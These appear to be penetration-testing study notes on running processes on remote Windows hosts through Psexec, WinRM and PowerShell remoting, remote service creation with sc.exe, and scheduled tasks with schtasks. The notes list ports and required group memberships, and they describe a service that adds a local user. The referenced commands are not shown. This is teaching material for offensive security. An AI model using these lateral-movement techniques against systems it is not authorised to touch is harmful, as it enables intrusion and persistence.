Spawning Processes Remotely
PRACTICE ! PRACTICE ! PRACTICE !
Last updated
PRACTICE ! PRACTICE ! PRACTICE !
Last updated
Ports => 445/TCP (SMB)
Required Group Memberships =>Administrator
Psexec (Traditional Method) has been the go-to method when needing to execute processes remotely
Connect to Admin$ share and upload a service binary - Psexec uses psexesvc.exe as the name
Connect to the service control manager to create and run a service named PSEXESVC and associate the service binary with C:\Windows\psexesvc.exe
Create some named pipes to handle stdin/stdout/stderr
To run psexec, we only need to supply the required administrator credentials for the remote host and the command we want to run
Ports => 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
Required Group Memberships => Remote Management Users
Windows Remote Management (WinRM) is a web-based protocol used to send Powershell commands to Windows hosts remotely
Most Windows Server installations will have WinRM enabled by default, making it an attractive attack vector
To connect to a remote Powershell session from the command line
We can achieve the same from Powershell, but to pass different credentials, we will need to create a PSCredential object
Once we have our PSCredential object, we can create an interactive session using the Enter-PSSession cmdlet
Powershell also includes the Invoke-Command cmdlet, which runs ScriptBlocks remotely via WinRM - Credentials must be passed through a PSCredential object as well
Ports
135/TCP, 49152-65535/TCP (DCE/RPC)
445/TCP (RPC over SMB Named Pipes)
139/TCP (RPC over SMB Named Pipes)
Required Group Memberships => Administrators
Windows services can also be leveraged to run arbitrary commands since they execute a command when started. While a service executable is technically different from a regular application, if we configure a Windows service to run any application, it will still execute it and fail afterwards
We can create a service on a remote host with sc.exe, a standard tool available in Windows - it will try to connect to the Service Control Manager (SVCCTL) remote service program through RPC in several ways
A connection attempt will be made using DCE/RPC
The client will first connect to the Endpoint Mapper (EPM) at port 135, which serves as a catalogue of available RPC endpoints and request information on the SVCCTL service program
The EPM will then respond with the IP and port to connect to SVCCTL, which is usually a dynamic port in the range of 49152-65535
If the latter connection fails, sc will try to reach SVCCTL through SMB named pipes, either on port 445 (SMB) or 139 (SMB over NetBIOS)
We can create and start a service named "NxGservice" using the following commands
The net user command will be executed when the service is started, creating a new local user on the system
Since the operating system is in charge of starting the service, you won't be able to look at the command output
To stop and delete the service, we can use
Another Windows feature is we can use Scheduled Tasks
We can create and run one remotely with schtasks, available in any Windows installation. To create a task named NxGtask1, we can use the following commands
We set the schedule type (/sc) to ONCE, which means the task is intended to be run only once at the specified time and date
Since we will be running the task manually, the starting date (/sd) and starting time (/st) won't matter much anyway
Since the system will run the scheduled task, the command's output won't be available to us, making this a blind attack
